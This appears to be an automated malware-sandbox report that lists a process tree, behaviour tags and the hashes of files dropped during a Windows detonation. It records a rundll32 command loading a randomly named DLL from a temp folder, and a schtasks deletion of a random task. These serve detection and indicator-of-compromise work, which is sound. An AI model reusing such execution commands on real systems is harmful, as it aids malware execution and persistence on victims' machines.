C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\DCpuRApo\GHpKiHR.dll",#1 /ALsite_idGph 5254031⤵PID:228
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\DCpuRApo\GHpKiHR.dll",#1 /ALsite_idGph 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jFAecgscnrJhBwrRF"3⤵PID:3732
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f081cd444c3c7e2ecd45c069d8e90911
SHA1de1f6c08346cd442675ce42f17034e4e5b1ac115
SHA256d4b5006e538245f60aaa1dfaefb06ecd87872664c854d68cb2056b796cc3e62d
SHA512ae099458621f949dad4d616eb20a0ac56b9afe90ecae92d35d9a03c7c0a35eb5c75c55e064ee08775c32e6ac0c2af85e63aaafed8036bf3f88fa9d6c2d082faa
-
Filesize
2KB
MD512d9e8ad011582ceff77b0a3f10aebd1
SHA1fb35d92f20cc6457ee958d2e2e71ea6880e2fce7
SHA25638840a661540707600d737a79cd5a5f7ad027e329035deb7f57f7e04d4496fce
SHA5125ddddab9a891a330bfc29312dbc55dbdc2f29360743fe9d86aa97f3a7bc545f937e0f352164b58e8522e45cfeaf30d9ced46229820efa312b8e3e4039901f626
-
Filesize
2KB
MD541acf46b56ba25f9ca462b0557c3ddf1
SHA10b0ef018a95292242dcbcb920d4b0950f40fe2e8
SHA256776cd6265a1c5beb4f6d9ee4eb9a1276d7a5688be7d93a7d7cf3c7979b412af9
SHA512fcae6ab74e89717fc4e683fa470238fff5ffbdd91a2901527e13755e3a4f4df97c61d18d47c07416a54cf06922cc4c5720f7c00b702a31ea97f56ef9abe8717a
-
Filesize
2KB
MD5707924de93e05ef8a1b2c5065da06f77
SHA1d125afa09c10968cd5e609a717c4826ab0f3e502
SHA256848454bb9f3294a19d9d8e174b761e7037e24a5ec36faf998da50a38cf20ebbb
SHA512dcc7a7f84043b8e9bc9b9bb9f662ee97360c41209fb979b30f55c49ab5a1fc7f2bd52bdc0169c3501da83f9039307d14c0b3871f1c1441484877962dd1b8ae06
-
Filesize
1.2MB
MD553b4bd2bb0a0e32a374a8f7988543eb8
SHA1d38d9f1266a317285d2e8618be5a137fd271f4c1
SHA256de6c7ab2f6bb994bba232e8653a17d1c52189ef408bd886043225e408b12adfc
SHA5123563cd39e58c9b1c0c162ab62e746854c57a443e11494ec431c470304c496929e03a2223d1a64362ff022d43403fc16fb1e4610114fe2f618cab469eaf278b76
-
Filesize
2KB
MD58bb139d375bef555e5e4297f90962339
SHA15d85da352df03795df7f36e28009fc2525c0e8de
SHA256cc38a85baf5f08eb52724a213e11edb88aedfbfb2e936aadd6fa3a2ffa7f16e3
SHA5126f39330a32abcf49b97bcbb09ff1d7ee8bd548ee92c62279adc4916590bded70d5fec62dd5f2564c9a6e7c150700861186064f824765b623042c8fb9775334cc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD53adb5c1baf1acf79388234db6e2cea30
SHA1fe3b4ccd45e3bc0026894ee0615947c27b105329
SHA2569f21572e5674ea6134bd43be7389b45e2b6a9c60d1c0499f1c5db261b5ac2c5d
SHA512d6fc2b2af2164e221eac582d7e11c7c0a19261eeff55da32a7f995cdb3568aba9423e119b4ac8ff8ac11509b93059669c7bc37618123f2034f761d50e1c2ca73
-
Filesize
34KB
MD53941a7b37817c3339f4735feb86a563e
SHA1bf2916925aa8761ff48783d82790e69fb1b4d3b8
SHA25678122bc9378f9bfb50ed6e3ad1d1a9b903cb30761c6acf13e7d20d49a4144b90
SHA512d8101d3497ad7b89286bb107710e4174ef87b5e70fc3d3b426fd2ef2a83c8a89f0ddf84598f6cb78d62653588685d4db3203818f6bb9325f8fc1012a80ed8ce2
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5c821e5d800a6ba45eeb10ec25bc258ba
SHA189701f96a8a60f071fd83ec1684b2d9459bfacf0
SHA2567734b7b5a9eb21caeca53d2610cc3aee292b708f3a5fb4262920899a68336a78
SHA51272ea3626f85203753559a224c8d132c6db65b9702912c425c8142825d41cc0c0a59203b8e7afade5f7d61f2499891f7e231cd624f40d1675daa0d0ff90fc62e6
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5cc61a9ecc1d85f05367ca3adafb90451
SHA146db75224f3a5dd2b65411c68e4e17d49f952541
SHA256a0c6aa553c26b505f5bd25f1e21198abe72d29b343e3b68be36f0ba13c1633e7
SHA5120ec9b6f9e536d598d1bae05cd45dd1b9f0d050a997ffca6582c219be7f0a9d505ba5dcc4367fe625f43295795025ead9a2766ab0c8546e0db878addb43ae3de4
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5e3ebdbef7fe39dc625a72adaace5d410
SHA1b84ee58ae170d728dc9cb3eb2a7bdec3660c33da
SHA256012ca4c2cd7621ab4a8725a6b6854e1d5506051d3c066fe2f3faf3f8ff176da9
SHA512151505b931a9a1646a19c3ca39b4a18afa841c9f6c1a7479f25368e4e0849c9f9aae1ea3330467da6576fb698ae393751b7f76d2b4c07e704d05ad6b36ca4367
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6KB
MD5b42a10775546afd0065f1d9306d6890a
SHA17c1511a95312cf3a629d1becce13522bd49a70ec
SHA2564b9e308b8a45e61746994d83be5f90a02b54e95fae2ec2481c9042956b8b3c95
SHA5126c1242635d59bea2a3b0d0595056832215ec83760d35ad9e4e6dbba61d0fdff495f64f07c7f9a7c3bbfeb65af43a94694a9f0a302973766ab3d76bf9ae4a1ea4
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732